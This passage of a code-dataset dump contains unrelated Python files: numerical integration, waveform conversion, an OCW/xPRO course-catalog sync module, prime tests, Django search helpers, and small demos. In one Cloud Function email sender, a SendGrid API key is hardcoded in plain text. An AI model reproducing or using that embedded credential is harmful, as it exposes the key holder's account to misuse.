(math.pi * 0.5)\n print(\"Trapezoidal:\")\n print(\"I%d = %.10f\" % (int(sys.argv[1]), (res * h / 2)))\n if (round(diff, 10) == -0):\n print(\"diff = 0.0000000000\")\n else:\n print(\"diff = %.10f\" % (math.fabs(diff)))\n print()\n\n\ndef simpsons():\n h = 0.5\n res = 0\n i = 0\n while (i < 10000):\n x = i * h\n if (i < 1):\n res += 4 * calc(x + h / 2)\n else:\n res += 2 * calc(x) + 4 * calc(x + h / 2)\n i += 1\n res = (calc(0) + calc(5000) + res) * h / 6\n diff = res - (math.pi * 0.5)\n print(\"Simpson:\")\n print(\"I%d = %.10f\" % (int(sys.argv[1]), res))\n if (round(diff, 10) == -0):\n print(\"diff = 0.0000000000\")\n else:\n print(\"diff = %.10f\" % (math.fabs(diff)))\n\n\ndef main():\n display_help()\n try:\n if (int(sys.argv[1]) < 0):\n sys.exit(84)\n except ValueError:\n sys.exit(84)\n midpoint()\n trapezoid()\n simpsons()\n sys.exit(0)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} 
+{"seq_id":"22445638","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Sep 29 14:25:49 2018\n\n@author: Phil Laird\n\"\"\"\nimport pandas as pd\nimport sys\nsys.path.append('/mnt/data01/workspace/bm_data/wave_analysis')\n\nimport sqlite3\nimport os\nimport convert\n\n\ndbfile = '/mnt/data04/Conduit/waves.db'\ndb = sqlite3.connect(dbfile)\nsql = (\"SELECT * FROM reports WHERE completed=0\")\nrows = pd.read_sql(sql, db)\noutpath = '/mnt/data04/Conduit/echo/waves/'\ntime_window = 24 # hours before and after echo time to convert waveforms\ndb.close()\n\n\nfor index, row in rows.iterrows():\n# print (row)\n path = row['path']\n if 'converted' in path:\n path = '/mnt/data04/bm_data/converted_xml'\n \n infile = path + '/' + row['filename']\n \n if not os.path.exists(infile):\n print ('trying converted files')\n infile = '/mnt/data04/bm_data/converted_xml/'+ row['filename']\n \n outfile = outpath + 'echo_case_' + format(row['Serial'], '03d') + '.hd5'\n serial = row['Serial']\n echo_time = pd.to_datetime(row['Date'])\n start_time = echo_time - pd.to_timedelta(time_window, 'H')\n stop_time = echo_time + pd.to_timedelta(time_window, 'H')\n #print ('Scanning file {} from {} to {}'.format(infile, start_time, stop_time))\n print ('Processing Serial: {} from file {}'.format(serial,outfile))\n \n # open db connection\n # update started field\n \n db = sqlite3.connect(dbfile)\n c = db.cursor()\n sql = ''' UPDATE reports\n SET started = 1\n WHERE Serial = ? '''\n \n c.execute(sql, (serial, ))\n db.commit()\n db.close()\n \n # start conversion of xml to hd5 for specified times\n\n convert.append_wfs(infile, outfile, start_time, stop_time)\n \n \n # update db\n \n db = sqlite3.connect(dbfile)\n c = db.cursor()\n \n\n sql = ''' UPDATE reports\n SET completed = 1 \n WHERE Serial = ? 
'''\n \n c.execute(sql, (serial, ))\n db.commit()\n db.close()\n \n \n # close db connection","sub_path":"echo_convert.py","file_name":"echo_convert.py","file_ext":"py","file_size_in_byte":2015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"176473307","text":"\"\"\"\ncourse_catalog api functions\n\"\"\"\nfrom datetime import datetime\nimport logging\nimport os\nimport re\nfrom subprocess import check_call, CalledProcessError\nfrom tempfile import TemporaryDirectory\n\nimport boto3\nimport rapidjson\nfrom django.db import transaction\nfrom django.conf import settings\nfrom django.contrib.contenttypes.models import ContentType\nfrom ocw_data_parser import OCWParser\nimport pytz\n\nfrom course_catalog.constants import (\n PlatformType,\n NON_COURSE_DIRECTORIES,\n AvailabilityType,\n OfferedBy,\n)\nfrom course_catalog.etl.loaders import load_offered_bys, load_content_files\nfrom course_catalog.etl.ocw import (\n get_ocw_learning_course_bucket,\n transform_content_files,\n)\nfrom course_catalog.etl.xpro import (\n get_xpro_learning_course_bucket,\n transform_content_files as transform_content_files_xpro,\n)\nfrom course_catalog.models import Bootcamp, LearningResourceRun, Course\nfrom course_catalog.serializers import (\n BootcampSerializer,\n OCWSerializer,\n LearningResourceRunSerializer,\n)\nfrom course_catalog.utils import get_course_url\nfrom search.task_helpers import (\n delete_course,\n upsert_course,\n index_new_bootcamp,\n update_bootcamp,\n)\n\nlog = logging.getLogger(__name__)\n\n\ndef safe_load_json(json_string, json_file_key):\n \"\"\"\n Loads the passed string as a JSON object with exception handing and logging.\n Some OCW JSON content may be malformed.\n\n Args:\n json_string (str): The JSON contents as a string\n json_file_key (str or bytes): file ID for the JSON file\n\n Returns:\n JSON (dict): the JSON contents as JSON\n \"\"\"\n try:\n loaded_json = rapidjson.loads(json_string)\n return loaded_json\n except rapidjson.JSONDecodeError:\n log.exception(\"%s has a corrupted JSON\", json_file_key)\n return {}\n\n\ndef digest_ocw_course(master_json, last_modified, is_published, course_prefix=\"\"):\n \"\"\"\n Takes in OCW course master json to store it in DB\n\n Args:\n master_json (dict): course master JSON object as an output from ocw-data-parser\n last_modified (datetime): timestamp of latest modification of all course files\n is_published (bool): Flags OCW course as published or not\n course_prefix (str): (Optional) String used to query S3 bucket for course raw JSONs\n \"\"\"\n if \"course_id\" not in master_json:\n log.error(\"Course %s is missing 'course_id'\", master_json.get(\"uid\"))\n return\n\n existing_course_instance = Course.objects.filter(\n platform=PlatformType.ocw.value, course_id=master_json[\"course_id\"]\n ).first()\n\n ocw_serializer = OCWSerializer(\n data={\n **master_json,\n \"last_modified\": last_modified,\n \"is_published\": True, # This will be updated after all course runs are serialized\n \"course_prefix\": course_prefix,\n },\n instance=existing_course_instance,\n )\n if not ocw_serializer.is_valid():\n log.error(\n \"Course %s is not valid: %s %s\",\n master_json.get(\"uid\"),\n ocw_serializer.errors,\n master_json.get(\"image_src\"),\n )\n return\n\n # Make changes atomically so we don't end up with partially saved/deleted data\n with transaction.atomic():\n if existing_course_instance is None:\n course = ocw_serializer.save()\n else:\n course = existing_course_instance\n\n 
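# record that OCW offers this course before the run itself is serialized below\n        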
load_offered_bys(course, [{\"name\": OfferedBy.ocw.value}])\n\n # Try and get the run instance.\n courserun_instance = course.runs.filter(\n platform=PlatformType.ocw.value, run_id=master_json.get(\"uid\")\n ).first()\n run_serializer = LearningResourceRunSerializer(\n data={\n **master_json,\n \"platform\": PlatformType.ocw.value,\n \"key\": master_json.get(\"uid\"),\n \"is_published\": is_published,\n \"staff\": master_json.get(\"instructors\"),\n \"seats\": [{\"price\": \"0.00\", \"mode\": \"audit\", \"upgrade_deadline\": None}],\n \"content_language\": master_json.get(\"language\"),\n \"short_description\": master_json.get(\"description\"),\n \"level_type\": master_json.get(\"course_level\"),\n \"year\": master_json.get(\"from_year\"),\n \"semester\": master_json.get(\"from_semester\"),\n \"availability\": AvailabilityType.current.value,\n \"image\": {\n \"src\": master_json.get(\"image_src\"),\n \"description\": master_json.get(\"image_description\"),\n },\n \"max_modified\": last_modified,\n \"content_type\": ContentType.objects.get(model=\"course\").id,\n \"object_id\": course.id,\n \"url\": get_course_url(\n master_json.get(\"uid\"), master_json, PlatformType.ocw.value\n ),\n \"raw_json\": master_json,\n },\n instance=courserun_instance,\n )\n if not run_serializer.is_valid():\n log.error(\n \"OCW LearningResourceRun %s is not valid: %s\",\n master_json.get(\"uid\"),\n run_serializer.errors,\n )\n return\n run = run_serializer.save()\n\n if existing_course_instance is not None:\n best_run = (\n existing_course_instance.runs.filter(published=True)\n .filter(best_start_date__isnull=False)\n .order_by(\"-best_start_date\")\n .first()\n )\n if best_run is not None and run.id == best_run.id:\n ocw_serializer.save()\n\n load_offered_bys(run, [{\"name\": OfferedBy.ocw.value}])\n return course, run\n\n\ndef get_s3_object_and_read(obj, iteration=0):\n \"\"\"\n Attempts to read S3 data, and tries again up to MAX_S3_GET_ITERATIONS if it encounters an error.\n This helps to prevent read timeout errors from stopping sync.\n\n Args:\n obj (s3.ObjectSummary): The S3 ObjectSummary we are trying to read\n iteration (int): A number tracking how many times this function has been run\n\n Returns:\n bytes: The contents of a json file read from S3\n \"\"\"\n try:\n return obj.get()[\"Body\"].read()\n except Exception: # pylint: disable=broad-except\n if iteration < settings.MAX_S3_GET_ITERATIONS:\n return get_s3_object_and_read(obj, iteration + 1)\n else:\n raise\n\n\ndef format_date(date_str):\n \"\"\"\n Coverts date from 2016/02/02 20:28:06 US/Eastern to 2016-02-02 20:28:06-05:00\n\n Args:\n date_str (String): Datetime object as string in the following format (2016/02/02 20:28:06 US/Eastern)\n Returns:\n Datetime object if passed date is valid, otherwise None\n \"\"\"\n if date_str and date_str != \"None\":\n date_pieces = date_str.split(\" \") # e.g. 
2016/02/02 20:28:06 US/Eastern\n date_pieces[0] = date_pieces[0].replace(\"/\", \"-\")\n # Discard milliseconds if exists\n date_pieces[1] = (\n date_pieces[1][:-4] if \".\" in date_pieces[1] else date_pieces[1]\n )\n tz = date_pieces.pop(2)\n timezone = pytz.timezone(tz) if \"GMT\" not in tz else pytz.timezone(\"Etc/\" + tz)\n tz_stripped_date = datetime.strptime(\" \".join(date_pieces), \"%Y-%m-%d %H:%M:%S\")\n tz_aware_date = timezone.localize(tz_stripped_date)\n tz_aware_date = tz_aware_date.astimezone(pytz.utc)\n return tz_aware_date\n return None\n\n\ndef generate_course_prefix_list(bucket):\n \"\"\"\n Assembles a list of OCW course prefixes from an S3 Bucket that contains all the raw jsons files\n\n Args:\n bucket (s3.Bucket): Instantiated S3 Bucket object\n Returns:\n List of course prefixes\n \"\"\"\n ocw_courses = set()\n log.info(\"Assembling list of courses...\")\n for bucket_file in bucket.objects.all():\n key_pieces = bucket_file.key.split(\"/\")\n course_prefix = (\n \"/\".join(key_pieces[0:2]) if key_pieces[0] == \"PROD\" else key_pieces[0]\n )\n # retrieve courses, skipping non-courses (bootcamps, department topics, etc)\n if course_prefix not in NON_COURSE_DIRECTORIES:\n if \"/\".join(key_pieces[:-2]) != \"\":\n ocw_courses.add(\"/\".join(key_pieces[:-2]) + \"/\")\n return list(ocw_courses)\n\n\ndef get_course_availability(course):\n \"\"\"\n Gets the attribute `availability` for a course if any\n\n Args:\n course (Course): Course model instance\n\n Returns:\n str: The url for the course if any\n \"\"\"\n if course.platform == PlatformType.ocw.value:\n return AvailabilityType.current.value\n elif course.platform == PlatformType.mitx.value:\n course_json = course.raw_json\n if course_json is None:\n return\n runs = course_json.get(\"course_runs\")\n if runs is None:\n return\n # get appropriate course_run\n for run in runs:\n if run.get(\"key\") == course.course_id:\n return run.get(\"availability\")\n\n\ndef parse_bootcamp_json_data(bootcamp_data, force_overwrite=False):\n \"\"\"\n Main function to parse bootcamp json data for one bootcamp\n\n Args:\n bootcamp_data (dict): The JSON object representing the bootcamp\n force_overwrite (bool): A boolean value to force the incoming bootcamp data to overwrite existing data\n \"\"\"\n # Get the last modified date from the bootcamp\n bootcamp_modified = bootcamp_data.get(\"last_modified\")\n\n # Try and get the bootcamp instance. 
If it exists check to see if it needs updating\n try:\n bootcamp_instance = Bootcamp.objects.get(\n course_id=bootcamp_data.get(\"course_id\")\n )\n compare_datetime = datetime.strptime(\n bootcamp_modified, \"%Y-%m-%dT%H:%M:%S.%fZ\"\n ).astimezone(pytz.utc)\n if compare_datetime <= bootcamp_instance.last_modified and not force_overwrite:\n log.debug(\n \"(%s, %s) skipped\",\n bootcamp_data.get(\"key\"),\n bootcamp_data.get(\"course_id\"),\n )\n return\n index_func = update_bootcamp\n except Bootcamp.DoesNotExist:\n bootcamp_instance = None\n index_func = index_new_bootcamp\n\n # Overwrite platform with our own enum value\n bootcamp_data[\"platform\"] = PlatformType.bootcamps.value\n bootcamp_serializer = BootcampSerializer(\n data=bootcamp_data, instance=bootcamp_instance\n )\n if not bootcamp_serializer.is_valid():\n log.error(\n \"Bootcamp %s is not valid: %s\",\n bootcamp_data.get(\"course_id\"),\n bootcamp_serializer.errors,\n )\n return\n\n # Make changes atomically so we don't end up with partially saved/deleted data\n with transaction.atomic():\n bootcamp = bootcamp_serializer.save()\n load_offered_bys(bootcamp, [{\"name\": OfferedBy.bootcamps.value}])\n\n # Try and get the LearningResourceRun instance.\n try:\n run_instance = bootcamp.runs.get(run_id=bootcamp.course_id)\n except LearningResourceRun.DoesNotExist:\n run_instance = None\n run_serializer = LearningResourceRunSerializer(\n data={\n **bootcamp_data,\n \"key\": bootcamp_data.get(\"course_id\"),\n \"staff\": bootcamp_data.get(\"instructors\"),\n \"seats\": bootcamp_data.get(\"prices\"),\n \"start\": bootcamp_data.get(\"start_date\"),\n \"end\": bootcamp_data.get(\"end_date\"),\n \"run_id\": bootcamp.course_id,\n \"max_modified\": bootcamp_modified,\n \"content_type\": ContentType.objects.get(model=\"bootcamp\").id,\n \"object_id\": bootcamp.id,\n \"url\": bootcamp.url,\n },\n instance=run_instance,\n )\n if not run_serializer.is_valid():\n log.error(\n \"Bootcamp LearningResourceRun %s is not valid: %s\",\n bootcamp_data.get(\"key\"),\n run_serializer.errors,\n )\n return\n run = run_serializer.save()\n\n load_offered_bys(run, [{\"name\": OfferedBy.bootcamps.value}])\n\n index_func(bootcamp.id)\n\n\ndef sync_ocw_course_files(ids=None):\n \"\"\"\n Sync all OCW course run files for a list of course ids to database\n\n Args:\n ids(list of int or None): list of course ids to process, all if None\n \"\"\"\n bucket = get_ocw_learning_course_bucket()\n courses = Course.objects.filter(platform=\"ocw\").filter(published=True)\n if ids:\n courses = courses.filter(id__in=ids)\n for course in courses.iterator():\n runs = course.runs.exclude(url=\"\").exclude(published=False)\n for run in runs.iterator():\n try:\n s3_master_json = rapidjson.loads(\n bucket.Object(\n \"{}/{}_master.json\".format(run.url.split(\"/\")[-1], run.run_id)\n )\n .get()[\"Body\"]\n .read()\n )\n load_content_files(run, transform_content_files(s3_master_json))\n except: # pylint: disable=bare-except\n log.exception(\"Error syncing files for course run %d\", run.id)\n\n\n# pylint: disable=too-many-locals, too-many-branches, too-many-statements\ndef sync_ocw_course(\n *, course_prefix, raw_data_bucket, force_overwrite, upload_to_s3, blacklist\n):\n \"\"\"\n Sync an OCW course run\n\n Args:\n course_prefix (str): The course prefix\n raw_data_bucket (boto3.resource): The S3 bucket containing the OCW information\n force_overwrite (bool): A boolean value to force the incoming course data to overwrite existing data\n upload_to_s3 (bool): If True, upload course media 
to S3\n blacklist (list of str): list of course ids that should not be published\n\n Returns:\n str:\n The UID, or None if the run_id is not found, or if it was found but not synced\n \"\"\"\n loaded_raw_jsons_for_course = []\n last_modified_dates = []\n uid = None\n is_published = True\n log.info(\"Syncing: %s ...\", course_prefix)\n\n # Collect last modified timestamps for all course files of the course\n for obj in raw_data_bucket.objects.filter(Prefix=course_prefix):\n # the \"1.json\" metadata file contains a course's uid\n if obj.key == course_prefix + \"0/1.json\":\n try:\n first_json = safe_load_json(get_s3_object_and_read(obj), obj.key)\n uid = first_json.get(\"_uid\")\n last_published_to_production = format_date(\n first_json.get(\"last_published_to_production\", None)\n )\n last_unpublishing_date = format_date(\n first_json.get(\"last_unpublishing_date\", None)\n )\n if last_published_to_production is None or (\n last_unpublishing_date\n and (last_unpublishing_date > last_published_to_production)\n ):\n is_published = False\n except: # pylint: disable=bare-except\n log.exception(\"Error encountered reading 1.json for %s\", course_prefix)\n # accessing last_modified from s3 object summary is fast (does not download file contents)\n last_modified_dates.append(obj.last_modified)\n if not uid:\n # skip if we're unable to fetch course's uid\n log.info(\"Skipping %s, no course_id\", course_prefix)\n return None\n # get the latest modified timestamp of any file in the course\n last_modified = max(last_modified_dates)\n\n # if course run synced before, check if modified since then\n courserun_instance = LearningResourceRun.objects.filter(\n platform=PlatformType.ocw.value, run_id=uid\n ).first()\n\n # Make sure that the data we are syncing is newer than what we already have\n if (\n courserun_instance\n and last_modified <= courserun_instance.last_modified\n and not force_overwrite\n ):\n log.info(\"Already synced. 
No changes found for %s\", course_prefix)\n return None\n\n # fetch JSON contents for each course file in memory (slow)\n log.info(\"Loading JSON for %s...\", course_prefix)\n for obj in sorted(\n raw_data_bucket.objects.filter(Prefix=course_prefix),\n key=lambda x: int(x.key.split(\"/\")[-1].split(\".\")[0]),\n ):\n loaded_raw_jsons_for_course.append(\n safe_load_json(get_s3_object_and_read(obj), obj.key)\n )\n\n log.info(\"Parsing for %s...\", course_prefix)\n # pass course contents into parser\n parser = OCWParser(loaded_jsons=loaded_raw_jsons_for_course)\n course_json = parser.get_master_json()\n course_json[\"uid\"] = uid\n course_json[\"course_id\"] = \"{}.{}\".format(\n course_json.get(\"department_number\"), course_json.get(\"master_course_number\")\n )\n if course_json[\"course_id\"] in blacklist:\n is_published = False\n\n if upload_to_s3 and is_published:\n try:\n parser.setup_s3_uploading(\n settings.OCW_LEARNING_COURSE_BUCKET_NAME,\n settings.OCW_LEARNING_COURSE_ACCESS_KEY,\n settings.OCW_LEARNING_COURSE_SECRET_ACCESS_KEY,\n # course_prefix now has trailing slash so [-2] below is the last\n # actual element and [-1] is an empty string\n course_prefix.split(\"/\")[-2],\n )\n if settings.OCW_UPLOAD_IMAGE_ONLY:\n parser.upload_course_image()\n else:\n parser.upload_all_media_to_s3(upload_master_json=True)\n except: # pylint: disable=bare-except\n log.exception(\n (\"Error encountered uploading OCW files for %s\", course_prefix)\n )\n raise\n\n log.info(\"Digesting %s...\", course_prefix)\n try:\n course, run = digest_ocw_course(\n course_json, last_modified, is_published, course_prefix\n )\n except TypeError:\n log.info(\"Course and run not returned, skipping\")\n return None\n\n if upload_to_s3 and is_published:\n load_content_files(run, transform_content_files(course_json))\n\n course.published = is_published or (\n Course.objects.get(id=course.id).runs.filter(published=True).exists()\n )\n course.save()\n if course.published:\n upsert_course(course.id)\n else:\n delete_course(course)\n\n\ndef sync_ocw_courses(*, course_prefixes, blacklist, force_overwrite, upload_to_s3):\n \"\"\"\n Sync OCW courses to the database\n\n Args:\n course_prefixes (list of str): The course prefixes to process\n blacklist (list of str): list of course ids to skip\n force_overwrite (bool): A boolean value to force the incoming course data to overwrite existing data\n upload_to_s3 (bool): If True, upload course media to S3\n\n Returns:\n set[str]: All LearningResourceRun.run_id values for course runs which were synced\n \"\"\"\n raw_data_bucket = boto3.resource(\n \"s3\",\n aws_access_key_id=settings.OCW_CONTENT_ACCESS_KEY,\n aws_secret_access_key=settings.OCW_CONTENT_SECRET_ACCESS_KEY,\n ).Bucket(name=settings.OCW_CONTENT_BUCKET_NAME)\n\n for course_prefix in course_prefixes:\n try:\n sync_ocw_course(\n course_prefix=course_prefix,\n raw_data_bucket=raw_data_bucket,\n force_overwrite=force_overwrite,\n upload_to_s3=upload_to_s3,\n blacklist=blacklist,\n )\n except: # pylint: disable=bare-except\n log.exception(\"Error encountered parsing OCW json for %s\", course_prefix)\n\n\ndef sync_xpro_course_files(ids):\n \"\"\"\n Sync all xPRO course run files for a list of course ids to database\n\n Args:\n ids(list of int): list of course ids to process\n \"\"\"\n bucket = get_xpro_learning_course_bucket()\n\n try:\n most_recent_export = next(\n reversed(\n sorted(\n [\n obj\n for obj in bucket.objects.all()\n if re.search(r\"/exported_courses_\\d+\\.tar\\.gz$\", obj.key)\n ],\n key=lambda obj: 
obj.last_modified,\n )\n )\n )\n except StopIteration:\n log.warning(\"No xPRO exported courses found in xPRO S3 bucket\")\n return\n\n course_content_type = ContentType.objects.get_for_model(Course)\n with TemporaryDirectory() as export_tempdir, TemporaryDirectory() as tar_tempdir:\n tarbytes = get_s3_object_and_read(most_recent_export)\n tarpath = os.path.join(export_tempdir, \"temp.tar.gz\")\n with open(tarpath, \"wb\") as f:\n f.write(tarbytes)\n\n try:\n check_call([\"tar\", \"xf\", tarpath], cwd=tar_tempdir)\n except CalledProcessError:\n log.exception(\"Unable to untar %s\", most_recent_export)\n return\n\n for course_tarfile in os.listdir(tar_tempdir):\n matches = re.search(r\"(.+)\\.tar\\.gz$\", course_tarfile)\n if not matches:\n log.error(\n \"Expected a tar file in exported courses tarball but found %s\",\n course_tarfile,\n )\n continue\n run_id = matches.group(1)\n run = LearningResourceRun.objects.filter(\n platform=PlatformType.xpro.value,\n run_id=run_id,\n content_type=course_content_type,\n object_id__in=ids,\n ).first()\n if not run:\n log.info(\"No xPRO courses matched course tarfile %s\", course_tarfile)\n continue\n\n course_tarpath = os.path.join(tar_tempdir, course_tarfile)\n try:\n load_content_files(run, transform_content_files_xpro(course_tarpath))\n except: # pylint: disable=bare-except\n log.exception(\"Error ingesting OLX content data for %s\", course_tarfile)\n","sub_path":"course_catalog/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":22117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"443367030","text":"import unittest\nfrom functools import reduce\n\nfrom prime import is_prime\nfrom factorize import factorize\n\n\nclass TestFactorize(unittest.TestCase):\n first_25_primes = {+2, +3, +5, +7, 11,\n 13, 17, 19, 23, 29,\n 31, 37, 41, 43, 47,\n 53, 59, 61, 67, 71,\n 73, 79, 83, 89, 97}\n\n def test_is_prime(self):\n for n in range(100):\n if n in self.first_25_primes:\n self.assertTrue(is_prime(n), \"{} must be prime\".format(n))\n else:\n self.assertFalse(is_prime(n), \"{} must be non-prime\".format(n))\n\n def test_factorize(self):\n for n in range(2, 100):\n product = reduce(lambda r, f: r * (f[0] ** f[1]), factorize(n), 1)\n self.assertTrue(n == product,\n \"{} != {}, i.e. 
product of its factorization\".format(n, product))\n","sub_path":"problems-1/bogush/problem-1/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"586356289","text":"from django.shortcuts import render\nfrom django.db.models import Q\nimport re\n\n# Create your views here.\ndef simple_search(model, fields, query_string, show_all=True):\n    if query_string:\n        query_string = query_string.strip()\n\n    if not query_string:\n        if show_all:\n            return model.objects.all()\n        else:\n            return model.objects.none()\n    entry_query = build_query(query_string, fields)\n    return model.objects.filter(entry_query)\n\n\ndef build_query(query_string, search_fields):\n    query = None  # Query to search for every search term\n    terms = normalize_query(query_string)\n    for term in terms:\n        or_query = None  # Query to search for a given term in each field\n        for field_name in search_fields:\n            q = Q(**{'%s__icontains' % field_name: term})\n\n            if or_query:\n                or_query = or_query | q\n            else:\n                or_query = q\n\n        if query:\n            query = query & or_query\n        else:\n            query = or_query\n    return query\n\n\ndef normalize_query(query_string,\n                    findterms=re.compile(r'\"([^\"]+)\"|(\\S+)').findall,\n                    normspace=re.compile(r'\\s{2,}').sub):\n\n    return [normspace(' ',\n                      (t[0] or t[1]).strip()) for t in findterms(query_string)]\n\n\ndef compile(pattern, flags=0):\n    \"Compile a regular expression pattern, returning a pattern object.\"\n    return re.compile(pattern, flags)","sub_path":"src/apps/core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"403132828","text":"import turtle\n\n\nwindow = turtle.Screen()\nturtle.speed(2)\ncolors = ['red','purple','blue','green','orange','yellow']\nrainben = turtle.Pen()\nturtle.bgcolor('black')\n\nfor i in range(360):\n    rainben.pencolor(colors[i%6])\n    rainben.width(i/100 + 1)\n    rainben.forward(i)\n    rainben.left(59)\n\n","sub_path":"spiral_helix.py","file_name":"spiral_helix.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"510607734","text":"# Import libraries\nimport json\n\n\n# Create method to read json file\ndef read(file):\n    \"\"\"\n    This method reads the string from a JSON file and parses the data into a dictionary object.\n    :param file: A JSON file with the .json extension\n    :type file: .json\n    :return: It returns json_data\n    :rtype: dict\n    \"\"\"\n    print('\\n Reading file')\n    with open(file) as json_file:\n        json_data = json.load(json_file)\n    return json_data\n\n\ndef max_count(json_data):\n    \"\"\"\n    Finds the value of the most repeated number and the times it was repeated in the JSON file\n    :param json_data: List with various numbers in it, ordered randomly\n    :type: list\n    :return: value and count\n    :rtype: int, int\n    \"\"\"\n    # Declare variables value and count.\n    value, count = 0, 0\n    for i in json_data:\n        if count < json_data.count(i):\n            count = json_data.count(i)\n            value = i\n    return value, count\n\n\n# Prints the value of the most repeated number and the times it was repeated in the JSON file\nprint('\\n Starting...')\nprint('\\n', max_count(read('max_count.json')))\nprint('\\n 
Done')\n","sub_path":"Instrumentacion_Electronica/1_Activity/Luis_Serrano/maximum_count.py","file_name":"maximum_count.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"303206763","text":"import Image\nfrom pylab import *\n\nim = Image.open('../data/leo_ratner.jpg')\ns = im.tostring() # convert PIL image -> string\n\n# convert string -> numerix array of floats\nrgb = fromstring(s, UInt8).astype(Float)/255.0 \n\n# resize to RGB array\nrgb = resize(rgb, (im.size[1], im.size[0], 3))\n\nimshow(rgb, interpolation='nearest')\naxis('off') # don't display the image axis\nshow()\n","sub_path":"trunk/users_guide/code/from_pil.py","file_name":"from_pil.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"188000258","text":"\"\"\"\n{\n \"name\": \"projects/prouno/locations/europe-west1/functions/function-email\",\n \"description\": \"Function for send email.\",\n \"entryPoint\": \"send_email\",\n \"runtime\": \"python37\"\n \"timeout\": \"60s\",\n \"availableMemoryMb\": 256,\n \"serviceAccountEmail\": \"prouno@appspot.gserviceaccount.com\",\n \"ingressSettings\": \"ALLOW_ALL\",\n \"sourceUploadUrl\": string\n \"eventTrigger\": {\n \"eventType\": \"google.pubsub.topic.publish\",\n \"resource\": \"projects/prouno/topics/report_email\",\n \"service\": \"pubsub.googleapis.com\",\n \"failurePolicy\": {}\n }\n}\n\"\"\"\n\n\ndef send_email(data, context):\n import sendgrid\n import base64\n from sendgrid.helpers.mail import Email, To, Content, Mail\n\n SENDGRID_API_KEY = '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'\n sg = sendgrid.SendGridAPIClient(api_key=SENDGRID_API_KEY)\n\n msg = base64.b64decode(data[\"data\"]).decode(\"utf-8\")\n # context info from pubsub\n\n from_email = Email(\"mrc.malagoli@gmail.com\")\n to_email = To(\"mrc.malagoli@gmail.com\")\n subject = \"LogNext Report\"\n content = Content(\"text/plain\", msg)\n mail = Mail(from_email, to_email, subject, content)\n response = sg.client.mail.send.post(request_body=mail.get())\n\n return\n","sub_path":"functions/function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"190779669","text":"import App\n\ndef Initialize():\n\t# Create the set (\"KavisAlpha2\")\n\tpSet = App.SetClass_Create()\n\tApp.g_kSetManager.AddSet(pSet, \"KavisAlpha2\")\n\n\t# Save the name of the region file that's creating the set.\n\tpSet.SetRegionModule(\"Systems.KavisAlpha.KavisAlpha2\")\n\n\t# Activate the proximity manager for our set.\n\tpSet.SetProximityManagerActive(1)\n\n\t# Load the placements and backdrops for this set.\n\tLoadPlacements(\"KavisAlpha2\")\n\tLoadBackdrops(pSet)\n\n\t#Load and place the grid.\n\tpGrid = App.GridClass_Create()\n\tpSet.AddObjectToSet(pGrid, \"grid\")\n\tpGrid.SetHidden(1)\n\n\t# Create static objects for this set:\n\t# If you want to create static objects for this region, make a\n\t# \"KavisAlpha2_S.py\" file with an Initialize function that creates them.\n\ttry:\n\t\timport KavisAlpha2_S\n\t\tKavisAlpha2_S.Initialize(pSet)\n\texcept ImportError:\n\t\t# Couldn't find the file. That's ok. 
Do nothing...\n\t\tpass\n\n\t# Done.\n\ndef GetSetName():\n\treturn \"KavisAlpha2\"\n\ndef GetSet():\n\treturn App.g_kSetManager.GetSet(\"KavisAlpha2\")\n\ndef Terminate():\n\tApp.g_kSetManager.DeleteSet(\"KavisAlpha2\")\n\ndef LoadPlacements(sSetName):\n\t# Light position \"Ambient Light\"\n\tkThis = App.LightPlacement_Create(\"Ambient Light\", sSetName, None)\n\tkThis.SetStatic(1)\n\tkThis.SetNavPoint(0)\n\tkThis.SetTranslateXYZ(0.000000, 0.000000, 0.000000)\n\tkForward = App.TGPoint3()\n\tkForward.SetXYZ(0.000000, 1.000000, 0.000000)\n\tkUp = App.TGPoint3()\n\tkUp.SetXYZ(0.000000, 0.000000, 1.000000)\n\tkThis.AlignToVectors(kForward, kUp)\n\tkThis.ConfigAmbientLight(1.000000, 0.700000, 0.700000, 0.100000)\n\tkThis.Update(0)\n\tkThis = None\n\t# End position \"Ambient Light\"\n\n\t# Light position \"Directional Light\"\n\tkThis = App.LightPlacement_Create(\"Directional Light\", sSetName, None)\n\tkThis.SetStatic(1)\n\tkThis.SetNavPoint(0)\n\tkThis.SetTranslateXYZ(-0.044018, 0.572347, 0.029146)\n\tkForward = App.TGPoint3()\n\tkForward.SetXYZ(0.076971, 0.995795, 0.049677)\n\tkUp = App.TGPoint3()\n\tkUp.SetXYZ(0.006759, -0.050345, 0.998709)\n\tkThis.AlignToVectors(kForward, kUp)\n\tkThis.ConfigDirectionalLight(1.000000, 0.700000, 0.700000, 0.8)\n\tkThis.Update(0)\n\tkThis = None\n\t# End position \"Directional Light\"\n\n\t# Position \"Sun\"\n\tkThis = App.Waypoint_Create(\"Sun\", sSetName, None)\n\tkThis.SetStatic(1)\n\tkThis.SetNavPoint(0)\n\tkThis.SetTranslateXYZ(0.000000, -425000.000000, 0.000000)\n\tkForward = App.TGPoint3()\n\tkForward.SetXYZ(0.000000, 1.000000, 0.000000)\n\tkUp = App.TGPoint3()\n\tkUp.SetXYZ(0.000000, 0.000000, 1.000000)\n\tkThis.AlignToVectors(kForward, 